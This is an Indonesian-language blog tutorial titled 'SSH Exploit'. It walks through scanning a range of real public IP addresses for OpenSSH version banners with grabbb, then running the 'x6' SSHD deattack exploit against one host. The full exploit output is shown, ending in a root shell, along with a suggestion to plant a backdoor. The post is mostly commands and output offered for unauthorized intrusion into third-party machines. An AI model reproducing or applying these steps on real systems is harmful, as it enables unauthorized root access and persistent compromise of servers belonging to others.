15 Jun 2011

SSH Exploit

Labels:

 

SSH mungkin udah banyak yang tahu akan hal yang satu ini, jadi di sini saya tidak
akan menjelaskan panjang lebar lagi, kita langsung saja ke materi yang akan kita
bahas kali ini, oke lets begi for exploit SSH..!!
Untuk mengeksploitasi apa yang namanya ssh kali ini kita harus menyiapkan
beberapa bahan ( kayak mau masak z nih, pke bahan segala ), yang di siapkan antara
lain :
1.  PC dengan OS linux ( di sini di gunakan backtrack 3 )
2.  Internet connection ( ini wajib ada )
3.  Perangkat perang ( grabbb, X2, X3, X4 atau X6 )
4.  Sedikit kesabaran
5.  Rokok ( buat perokok )
Langsung kita coba
Download tool grabb
Kemudian di extrack, ini jangan di lupain
Selanjutnya kita scan beberapa ip, untuk mendapatkan ip nganggur cari z dengan
kreatifnya kalian,,!!
Sekarang kita mulai scan ip yang kita dapatkan tadi, ip ini untuk dapetin versi dari
SSH, kita menggunakan SSH untuk tahu versinya, langsung ke console linux
# grabbb –a 83.233.30.1 -b 83.233.30.255 22
Keterangan dari command di atas :
-a = starting ip target
-b = end of ip target
22 = ini merupakan port dari SSH
Dari scan di atas di dapatlah seperti di bawah ini :
83.233.30.9:22: SSH-2.0-OpenSSH_4.3
83.233.30.7:22: SSH-2.0-OpenSSH_5.1p1 Debian-5
83.233.30.247:22: SSH-2.0-OpenSSH_4.3
83.233.30.251:22: SSH-2.0-OpenSSH_4.3
83.233.30.252:22: SSH-2.0-OpenSSH_4.3
83.233.30.13:22: SSH-2.0-OpenSSH_4.3
83.233.30.234:22: SSH-2.0-OpenSSH_5.1p1 Debian-4
83.233.30.193:22: SSH-2.0-OpenSSH_4.3
83.233.30.232:22: SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3
83.233.30.233:22: SSH-2.0-OpenSSH_4.3
83.233.30.235:22: SSH-2.0-OpenSSH_4.3
83.233.30.239:22: SSH-2.0-OpenSSH_4.3
83.233.30.207:22: SSH-1.99-OpenSSH_2.2.0p1
Di atas merupakan versi dari SSh hasil scan grabb, lanjut ke tahap berikutnya
Langsung masuk ke direktori di mana kita menyimpan exploit X3, X3, X4, dan X6
pilih salah satu, di sini penulis menggunakan xpl X6, kenapa?
Karena penulis rasa ini lebih komplit
# X6 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.teamteso.
net)
Targets:
( 1) ---------*-------------*------------
( 2) Small - SSH-1.5-1.2.3
( 3) Small - SSH-1.5-1.2
( 4) Small - SSH-1.5-1.2.2
( 5) Small - SSH-1.5-1.2.25
( 6) Small - SSH-1.5-1.2.26
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.5-1.2.29
( 9) Small - SSH-1.5-1.2.30
(10) Small - SSH-1.5-1.2.31
Di sini terdapat banyak jenis SSh, kata penulis terlalu banyak untuk di tulis, hehe
Ini yang akan kita eksploitasi
83.233.30.207:22: SSH-1.99-OpenSSH_2.2.0p1
Langsung ke console linux kita lagi, lalu ketikan
# x6 –t 76 83.233.30.207:22 
Keterangan :
-t = untuk menjalankan xpl
76 = nomor dari cersi SSH
# x6 -t 76 83.233.30.207:22
SSHD deattack exploit. By Dvorak with Code from teso ( http://www.teamteso.
net ) 
Target: Big - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 83.233.30.207:22 
Testing if remote sshd is vulnerable # ATTACH NOW 
trus di ENTER
YES # 
Finding h - buf distance (estimate) 
(1 ) testing 0x00000004 # SEGV # 
(2 ) testing 0x0000c804 # FOUND # 
Found buffer, determining exact diff 
Finding h - buf distance using the teso method 
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # 
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED 
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # 
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED # 
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV # 
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED # 
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV # 
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV # 
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED # 
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED # 
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED # 
Bin search done, testing result 
Finding exact h - buf distance 
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324 
Looking for exact buffer address 
Finding exact buffer address 
(17) Trying: 0x080c5324 # SEGV # 
(18) Trying: 0x080c6324 # SEGV # 
(19) Trying: 0x080c7324 # SEGV # 
(20) Trying: 0x080c8324 # SEGV # 
(21) Trying: 0x0810e324 # SURVIVED # 
(22 Trying: 0x08088634 # OK # 
Finding distance till stack buffer 
Crash, finding next return address 
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 
ATTACH NOW 
Changing MSW of return address to: 0x0807 
Crash, finding next return address 
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 
ATTACH NOW 
Changing MSW of return address to: 0x0807 
Crash, finding next return address 
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 
ATTACH NOW 
Changing MSW of return address to: 0x0807 
Crash, finding next return address 
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 
ATTACH NOW 
Changing MSW of return address to: 0x0807 
********* YOU ARE IN ********* 
uname -a ; id 
uname -a ; id 
Linux debian 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown 
uid=0(root) gid=0(root) groups=0(root)
sekarang kita udah masuk kr PC target tadi, terserah mau di apain deh klo mau kita
pasang backdoor z,kan lebih bagus tuh..

author :arDhi^
eheheh, selanjutnya kita pilih target kita lalu samakan versi dari SSHnya dari
scanning kita tadi

|

Friends Blog

Sponsors : Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Template Design by Cool Blogger Tutorials | Published by Templates Doctor
Powered by Blogger